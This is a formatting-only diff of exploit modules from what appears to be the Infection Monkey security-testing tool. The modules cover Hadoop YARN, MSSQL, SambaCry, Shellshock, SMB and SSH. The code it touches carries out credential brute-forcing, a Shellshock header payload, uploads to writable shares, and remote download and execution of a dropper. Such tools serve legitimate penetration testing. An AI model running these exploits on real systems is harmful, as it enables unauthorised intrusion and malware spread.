rand_name = ID_STRING + "".join(
- [random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
+ [random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
- posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
+ posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
+ timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
def check_if_exploitable(self, url):
try:
resp = requests.post(
- posixpath.join(url, "ws/v1/cluster/apps/new-application"),
- timeout=LONG_REQUEST_TIMEOUT,
+ posixpath.join(url, "ws/v1/cluster/apps/new-application"),
+ timeout=LONG_REQUEST_TIMEOUT,
)
except requests.ConnectionError:
return False
@@ -90,7 +93,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
- self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
+ self.host, get_monkey_depth() - 1,
+ vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
@@ -98,22 +102,22 @@ class HadoopExploiter(WebRCE):
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
- "monkey_path": path,
- "http_path": http_path,
- "monkey_type": MONKEY_ARG,
- "parameters": monkey_cmd,
+ "monkey_path":path,
+ "http_path":http_path,
+ "monkey_type":MONKEY_ARG,
+ "parameters":monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
- "application-id": app_id,
- "application-name": name,
- "am-container-spec": {
- "commands": {
- "command": command,
+ "application-id":app_id,
+ "application-name":name,
+ "am-container-spec":{
+ "commands":{
+ "command":command,
}
},
- "application-type": "YARN",
+ "application-type":"YARN",
}
return payload
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 893ee8ca1..816c7d6b1 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -50,18 +50,19 @@ class MSSQLExploiter(HostExploiter):
self.cursor = None
self.monkey_server = None
self.payload_file_path = os.path.join(
- MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
+ MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
)
def _exploit_host(self):
"""
First this method brute forces to get the mssql connection (cursor).
- Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
+ Also, don't forget to start_monkey_server() before self.upload_monkey() and
+ self.stop_monkey_server() after
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
self.cursor = self.brute_force(
- self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
+ self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
)
# Create dir for payload
@@ -91,13 +92,13 @@ class MSSQLExploiter(HostExploiter):
def create_temp_dir(self):
dir_creation_command = MSSQLLimitedSizePayload(
- command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
+ command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
)
self.run_mssql_command(dir_creation_command)
def create_empty_payload_file(self):
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
- payload_file_path=self.payload_file_path
+ payload_file_path=self.payload_file_path
)
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
self.run_mssql_command(tmp_file_creation_command)
@@ -126,11 +127,11 @@ class MSSQLExploiter(HostExploiter):
def remove_temp_dir(self):
# Remove temporary dir we stored payload at
tmp_file_removal_command = MSSQLLimitedSizePayload(
- command="del {}".format(self.payload_file_path)
+ command="del {}".format(self.payload_file_path)
)
self.run_mssql_command(tmp_file_removal_command)
tmp_dir_removal_command = MSSQLLimitedSizePayload(
- command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
+ command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
)
self.run_mssql_command(tmp_dir_removal_command)
@@ -150,27 +151,27 @@ class MSSQLExploiter(HostExploiter):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
# Form monkey's launch command
monkey_args = build_monkey_commandline(
- self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path
+ self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path
)
suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload(
- command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
- prefix=prefix,
- suffix=suffix,
+ command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
+ prefix=prefix,
+ suffix=suffix,
)
def get_monkey_download_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
- http_path=self.monkey_server.http_path, dst_path=dst_path
+ http_path=self.monkey_server.http_path, dst_path=dst_path
)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
- payload_file_path=self.payload_file_path
+ payload_file_path=self.payload_file_path
)
return MSSQLLimitedSizePayload(
- command=monkey_download_command, suffix=suffix, prefix=prefix
+ command=monkey_download_command, suffix=suffix, prefix=prefix
)
def brute_force(self, host, port, users_passwords_pairs_list):
@@ -181,10 +182,12 @@ class MSSQLExploiter(HostExploiter):
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
- users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
+ users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
+ with
Return:
- True or False depends if the whole bruteforce and attack process was completed successfully or not
+ True or False depends if the whole bruteforce and attack process was completed
+ successfully or not
"""
# Main loop
# Iterates on users list
@@ -193,12 +196,12 @@ class MSSQLExploiter(HostExploiter):
# Core steps
# Trying to connect
conn = pymssql.connect(
- host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
+ host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
)
LOG.info(
- "Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
- host, user, self._config.hash_sensitive_data(password)
- )
+ "Successfully connected to host: {0}, using user: {1}, password ("
+ "SHA-512): {2}".format(host, user,
+ self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)
@@ -210,19 +213,19 @@ class MSSQLExploiter(HostExploiter):
pass
LOG.warning(
- "No user/password combo was able to connect to host: {0}:{1}, "
- "aborting brute force".format(host, port)
+ "No user/password combo was able to connect to host: {0}:{1}, "
+ "aborting brute force".format(host, port)
)
raise FailedExploitationError(
- "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
+ "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
)
class MSSQLLimitedSizePayload(LimitedSizePayload):
def __init__(self, command, prefix="", suffix=""):
super(MSSQLLimitedSizePayload, self).__init__(
- command=command,
- max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
- prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
- suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END,
+ command=command,
+ max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
+ prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
+ suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END,
)
diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py
index b0387105e..31cf8a4b0 100644
--- a/monkey/infection_monkey/exploit/sambacry.py
+++ b/monkey/infection_monkey/exploit/sambacry.py
@@ -54,7 +54,8 @@ LOG = logging.getLogger(__name__)
class SambaCryExploiter(HostExploiter):
"""
- SambaCry exploit module, partially based on the following implementation by CORE Security Technologies' impacket:
+ SambaCry exploit module, partially based on the following implementation by CORE Security
+ Technologies' impacket:
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
"""
@@ -88,13 +89,13 @@ class SambaCryExploiter(HostExploiter):
writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr)
LOG.info(
- "Writable shares and their credentials on host %s: %s"
- % (self.host.ip_addr, str(writable_shares_creds_dict))
+ "Writable shares and their credentials on host %s: %s"
+ % (self.host.ip_addr, str(writable_shares_creds_dict))
)
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
- self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
+ self.exploit_info["shares"][share] = {"creds":writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@@ -104,23 +105,23 @@ class SambaCryExploiter(HostExploiter):
for share in writable_shares_creds_dict:
trigger_result = self.get_trigger_result(
- self.host.ip_addr, share, writable_shares_creds_dict[share]
+ self.host.ip_addr, share, writable_shares_creds_dict[share]
)
creds = writable_shares_creds_dict[share]
self.report_login_attempt(
- trigger_result is not None,
- creds["username"],
- creds["password"],
- creds["lm_hash"],
- creds["ntlm_hash"],
+ trigger_result is not None,
+ creds["username"],
+ creds["password"],
+ creds["lm_hash"],
+ creds["ntlm_hash"],
)
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
- "username": creds["username"],
- "host": self.host.ip_addr,
- "port": self.SAMBA_PORT,
- "share_name": share,
+ "username":creds["username"],
+ "host":self.host.ip_addr,
+ "port":self.SAMBA_PORT,
+ "share_name":share,
}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@@ -130,8 +131,8 @@ class SambaCryExploiter(HostExploiter):
if len(successfully_triggered_shares) > 0:
LOG.info(
- "Shares triggered successfully on host %s: %s"
- % (self.host.ip_addr, str(successfully_triggered_shares))
+ "Shares triggered successfully on host %s: %s"
+ % (self.host.ip_addr, str(successfully_triggered_shares))
)
self.add_vuln_port(self.SAMBA_PORT)
return True
@@ -151,8 +152,8 @@ class SambaCryExploiter(HostExploiter):
self.trigger_module(smb_client, share)
except (impacket.smbconnection.SessionError, SessionError):
LOG.debug(
- "Exception trying to exploit host: %s, share: %s, with creds: %s."
- % (self.host.ip_addr, share, str(creds))
+ "Exception trying to exploit host: %s, share: %s, with creds: %s."
+ % (self.host.ip_addr, share, str(creds))
)
def clean_share(self, ip, share, creds):
@@ -194,7 +195,8 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
- tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
+ tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
+ desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@@ -235,12 +237,12 @@ class SambaCryExploiter(HostExploiter):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = [
- {"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
+ {"username":user, "password":password, "lm_hash":lm_hash, "ntlm_hash":ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds
]
# Add empty credentials for anonymous shares.
- creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
+ creds.insert(0, {"username":"", "password":"", "lm_hash":"", "ntlm_hash":""})
return creds
@@ -266,28 +268,28 @@ class SambaCryExploiter(HostExploiter):
pattern_result = pattern.search(smb_server_name)
is_vulnerable = False
if pattern_result is not None:
- samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
+ samba_version = smb_server_name[pattern_result.start(): pattern_result.end()]
samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
is_vulnerable = True
elif (
- (samba_version_parts[0] == "4")
- and (samba_version_parts[1] == "4")
- and (samba_version_parts[1] <= "13")
+ (samba_version_parts[0] == "4")
+ and (samba_version_parts[1] == "4")
+ and (samba_version_parts[1] <= "13")
):
is_vulnerable = True
elif (
- (samba_version_parts[0] == "4")
- and (samba_version_parts[1] == "5")
- and (samba_version_parts[1] <= "9")
+ (samba_version_parts[0] == "4")
+ and (samba_version_parts[1] == "5")
+ and (samba_version_parts[1] <= "9")
):
is_vulnerable = True
elif (
- (samba_version_parts[0] == "4")
- and (samba_version_parts[1] == "6")
- and (samba_version_parts[1] <= "3")
+ (samba_version_parts[0] == "4")
+ and (samba_version_parts[1] == "6")
+ and (samba_version_parts[1] <= "3")
):
is_vulnerable = True
else:
@@ -295,8 +297,8 @@ class SambaCryExploiter(HostExploiter):
is_vulnerable = True
LOG.info(
- "Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s"
- % (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))
+ "Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s"
+ % (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))
)
return is_vulnerable
@@ -310,20 +312,20 @@ class SambaCryExploiter(HostExploiter):
tree_id = smb_client.connectTree(share)
with self.get_monkey_commandline_file(
- self._config.dropper_target_path_linux
+ self._config.dropper_target_path_linux
) as monkey_commandline_file:
smb_client.putFile(
- share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read
+ share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read
)
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
smb_client.putFile(
- share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read
+ share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read
)
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
smb_client.putFile(
- share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read
+ share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read
)
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
@@ -331,18 +333,18 @@ class SambaCryExploiter(HostExploiter):
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
smb_client.putFile(
- share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read
+ share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read
)
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
smb_client.putFile(
- share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read
+ share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read
)
T1105Telem(
- ScanStatus.USED,
- get_interface_to_target(self.host.ip_addr),
- self.host.ip_addr,
- monkey_bin_64_src_path,
+ ScanStatus.USED,
+ get_interface_to_target(self.host.ip_addr),
+ self.host.ip_addr,
+ monkey_bin_64_src_path,
).send()
smb_client.disconnectTree(tree_id)
@@ -372,7 +374,8 @@ class SambaCryExploiter(HostExploiter):
# the extra / on the beginning is required for the vulnerability
self.open_pipe(smb_client, "/" + module_path)
except Exception as e:
- # This is the expected result. We can't tell whether we succeeded or not just by this error code.
+ # This is the expected result. We can't tell whether we succeeded or not just by this
+ # error code.
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
return True
else:
@@ -401,10 +404,11 @@ class SambaCryExploiter(HostExploiter):
def get_monkey_commandline_file(self, location):
return BytesIO(
- DROPPER_ARG
- + build_monkey_commandline(
- self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
- )
+ DROPPER_ARG
+ + build_monkey_commandline(
+ self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
+ str(location)
+ )
)
@staticmethod
@@ -442,29 +446,30 @@ class SambaCryExploiter(HostExploiter):
"""
smb_client = SMBConnection(ip, ip)
smb_client.login(
- credentials["username"],
- credentials["password"],
- "",
- credentials["lm_hash"],
- credentials["ntlm_hash"],
+ credentials["username"],
+ credentials["password"],
+ "",
+ credentials["lm_hash"],
+ credentials["ntlm_hash"],
)
return smb_client
- # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
+ # Following are slightly modified SMB functions from impacket to fit our needs of the
+ # vulnerability #
@staticmethod
def create_smb(
- smb_client,
- treeId,
- fileName,
- desiredAccess,
- shareMode,
- creationOptions,
- creationDisposition,
- fileAttributes,
- impersonationLevel=SMB2_IL_IMPERSONATION,
- securityFlags=0,
- oplockLevel=SMB2_OPLOCK_LEVEL_NONE,
- createContexts=None,
+ smb_client,
+ treeId,
+ fileName,
+ desiredAccess,
+ shareMode,
+ creationOptions,
+ creationDisposition,
+ fileAttributes,
+ impersonationLevel=SMB2_IL_IMPERSONATION,
+ securityFlags=0,
+ oplockLevel=SMB2_OPLOCK_LEVEL_NONE,
+ createContexts=None,
):
packet = smb_client.getSMBServer().SMB_PACKET()
@@ -492,7 +497,7 @@ class SambaCryExploiter(HostExploiter):
if createContexts is not None:
smb2Create["Buffer"] += createContexts
smb2Create["CreateContextsOffset"] = (
- len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"]
+ len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"]
)
smb2Create["CreateContextsLength"] = len(createContexts)
else:
@@ -513,7 +518,8 @@ class SambaCryExploiter(HostExploiter):
@staticmethod
def open_pipe(smb_client, pathName):
- # We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
+ # We need to overwrite Impacket's openFile functions since they automatically convert
+ # paths to NT style
# to make things easier for the caller. Not this time ;)
treeId = smb_client.connectTree("IPC$")
LOG.debug("Triggering path: %s" % pathName)
@@ -543,12 +549,12 @@ class SambaCryExploiter(HostExploiter):
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
else:
return SambaCryExploiter.create_smb(
- smb_client,
- treeId,
- pathName,
- desiredAccess=FILE_READ_DATA,
- shareMode=FILE_SHARE_READ,
- creationOptions=FILE_OPEN,
- creationDisposition=FILE_NON_DIRECTORY_FILE,
- fileAttributes=0,
+ smb_client,
+ treeId,
+ pathName,
+ desiredAccess=FILE_READ_DATA,
+ shareMode=FILE_SHARE_READ,
+ creationOptions=FILE_OPEN,
+ creationDisposition=FILE_NON_DIRECTORY_FILE,
+ fileAttributes=0,
)
diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py
index 11932c3f5..6039ad00f 100644
--- a/monkey/infection_monkey/exploit/shellshock.py
+++ b/monkey/infection_monkey/exploit/shellshock.py
@@ -1,4 +1,5 @@
-# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
+# Implementation is based on shellshock script provided
+# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
@@ -28,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
- _attacks = {"Content-type": "() { :;}; echo; "}
+ _attacks = {"Content-type":"() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
@@ -37,17 +38,17 @@ class ShellShockExploiter(HostExploiter):
super(ShellShockExploiter, self).__init__(host)
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.success_flag = "".join(
- choice(string.ascii_uppercase + string.digits) for _ in range(20)
+ choice(string.ascii_uppercase + string.digits) for _ in range(20)
)
self.skip_exist = self._config.skip_exploit_if_file_exist
def _exploit_host(self):
# start by picking ports
candidate_services = {
- service: self.host.services[service]
+ service:self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
- and (self.host.services[service]["name"] == "http")
+ and (self.host.services[service]["name"] == "http")
}
valid_ports = [
@@ -59,8 +60,8 @@ class ShellShockExploiter(HostExploiter):
https_ports = [port[0] for port in valid_ports if port[1]]
LOG.info(
- "Scanning %s, ports [%s] for vulnerable CGI pages"
- % (self.host, ",".join([str(port[0]) for port in valid_ports]))
+ "Scanning %s, ports [%s] for vulnerable CGI pages"
+ % (self.host, ",".join([str(port[0]) for port in valid_ports]))
)
attackable_urls = []
@@ -103,17 +104,18 @@ class ShellShockExploiter(HostExploiter):
self.host.os["machine"] = uname_machine.lower().strip()
except Exception as exc:
LOG.debug(
- "Error running uname machine command on victim %r: (%s)", self.host, exc
+ "Error running uname machine command on victim %r: (%s)", self.host, exc
)
return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
if self.skip_exist and (
- self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
+ self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
):
LOG.info(
- "Host %s was already infected under the current configuration, done" % self.host
+ "Host %s was already infected under the current configuration, "
+ "done" % self.host
)
return True # return already infected
@@ -136,7 +138,7 @@ class ShellShockExploiter(HostExploiter):
download = exploit + download_command
self.attack_page(
- url, header, download
+ url, header, download
) # we ignore failures here since it might take more than TIMEOUT time
http_thread.join(DOWNLOAD_TIMEOUT)
@@ -145,10 +147,10 @@ class ShellShockExploiter(HostExploiter):
self._remove_lock_file(exploit, url, header)
if (http_thread.downloads != 1) or (
- "ELF"
- not in self.check_remote_file_exists(
+ "ELF"
+ not in self.check_remote_file_exists(
url, header, exploit, dropper_target_path_linux
- )
+ )
):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue
@@ -162,26 +164,26 @@ class ShellShockExploiter(HostExploiter):
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(
- self.host,
- get_monkey_depth() - 1,
- HTTPTools.get_port_from_url(url),
- dropper_target_path_linux,
+ self.host,
+ get_monkey_depth() - 1,
+ HTTPTools.get_port_from_url(url),
+ dropper_target_path_linux,
)
cmdline += " & "
run_path = exploit + cmdline
self.attack_page(url, header, run_path)
LOG.info(
- "Executed monkey '%s' on remote victim %r (cmdline=%r)",
- self._config.dropper_target_path_linux,
- self.host,
- cmdline,
+ "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+ self._config.dropper_target_path_linux,
+ self.host,
+ cmdline,
)
if not (
- self.check_remote_file_exists(
- url, header, exploit, self._config.monkey_log_path_linux
- )
+ self.check_remote_file_exists(
+ url, header, exploit, self._config.monkey_log_path_linux
+ )
):
LOG.info("Log file does not exist, monkey might not have run")
continue
@@ -241,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(
- url, headers={header: attack}, verify=False, timeout=TIMEOUT
+ url, headers={header:attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123
result = r.content.decode()
return result
@@ -270,7 +272,8 @@ class ShellShockExploiter(HostExploiter):
break
if timeout:
LOG.debug(
- "Some connections timed out while sending request to potentially vulnerable urls."
+ "Some connections timed out while sending request to potentially vulnerable "
+ "urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]
diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index 4b5e941f8..e5e337596 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
- "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
- "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
+ "139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139),
+ "445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445),
}
USE_KERBEROS = False
@@ -63,32 +63,33 @@ class SmbExploiter(HostExploiter):
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
- self.host,
- src_path,
- self._config.dropper_target_path_win_32,
- user,
- password,
- lm_hash,
- ntlm_hash,
- self._config.smb_download_timeout,
+ self.host,
+ src_path,
+ self._config.dropper_target_path_win_32,
+ user,
+ password,
+ lm_hash,
+ ntlm_hash,
+ self._config.smb_download_timeout,
)
if remote_full_path is not None:
LOG.debug(
- "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
- self.host,
- user,
- self._config.hash_sensitive_data(password),
- self._config.hash_sensitive_data(lm_hash),
- self._config.hash_sensitive_data(ntlm_hash),
+ "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
+ "%s : (SHA-512) %s)",
+ self.host,
+ user,
+ self._config.hash_sensitive_data(password),
+ self._config.hash_sensitive_data(lm_hash),
+ self._config.hash_sensitive_data(ntlm_hash),
)
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.add_vuln_port(
- "%s or %s"
- % (
- SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
- SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
- )
+ "%s or %s"
+ % (
+ SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
+ SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
+ )
)
exploited = True
break
@@ -98,14 +99,15 @@ class SmbExploiter(HostExploiter):
except Exception as exc:
LOG.debug(
- "Exception when trying to copy file using SMB to %r with user:"
- " %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
- self.host,
- user,
- self._config.hash_sensitive_data(password),
- self._config.hash_sensitive_data(lm_hash),
- self._config.hash_sensitive_data(ntlm_hash),
- exc,
+ "Exception when trying to copy file using SMB to %r with user:"
+ " %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
+ "SHA-512): %s: (%s)",
+ self.host,
+ user,
+ self._config.hash_sensitive_data(password),
+ self._config.hash_sensitive_data(lm_hash),
+ self._config.hash_sensitive_data(ntlm_hash),
+ exc,
)
continue
@@ -117,18 +119,18 @@ class SmbExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
- "dropper_path": remote_full_path
+ "dropper_path":remote_full_path
} + build_monkey_commandline(
- self.host,
- get_monkey_depth() - 1,
- self.vulnerable_port,
- self._config.dropper_target_path_win_32,
+ self.host,
+ get_monkey_depth() - 1,
+ self.vulnerable_port,
+ self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
- "monkey_path": remote_full_path
+ "monkey_path":remote_full_path
} + build_monkey_commandline(
- self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
+ self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
)
smb_conn = False
@@ -147,10 +149,10 @@ class SmbExploiter(HostExploiter):
scmr_rpc.connect()
except Exception as exc:
LOG.debug(
- "Can't connect to SCM on exploited machine %r port %s : %s",
- self.host,
- port,
- exc,
+ "Can't connect to SCM on exploited machine %r port %s : %s",
+ self.host,
+ port,
+ exc,
)
continue
@@ -167,11 +169,11 @@ class SmbExploiter(HostExploiter):
# start the monkey using the SCM
resp = scmr.hRCreateServiceW(
- scmr_rpc,
- sc_handle,
- self._config.smb_service_name,
- self._config.smb_service_name,
- lpBinaryPathName=cmdline,
+ scmr_rpc,
+ sc_handle,
+ self._config.smb_service_name,
+ self._config.smb_service_name,
+ lpBinaryPathName=cmdline,
)
service = resp["lpServiceHandle"]
try:
@@ -185,18 +187,18 @@ class SmbExploiter(HostExploiter):
scmr.hRCloseServiceHandle(scmr_rpc, service)
LOG.info(
- "Executed monkey '%s' on remote victim %r (cmdline=%r)",
- remote_full_path,
- self.host,
- cmdline,
+ "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+ remote_full_path,
+ self.host,
+ cmdline,
)
self.add_vuln_port(
- "%s or %s"
- % (
- SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
- SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
- )
+ "%s or %s"
+ % (
+ SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
+ SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
+ )
)
return True
diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py
index 0f5af3258..61c9ddf52 100644
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@@ -58,14 +58,15 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
- "Successfully logged in %s using %s users private key", self.host, ssh_string
+ "Successfully logged in %s using %s users private key", self.host,
+ ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
except Exception:
ssh.close()
LOG.debug(
- "Error logging into victim %r with %s" " private key", self.host, ssh_string
+ "Error logging into victim %r with %s" " private key", self.host, ssh_string
)
self.report_login_attempt(False, user, ssh_key=ssh_string)
continue
@@ -82,10 +83,10 @@ class SSHExploiter(HostExploiter):
ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port)
LOG.debug(
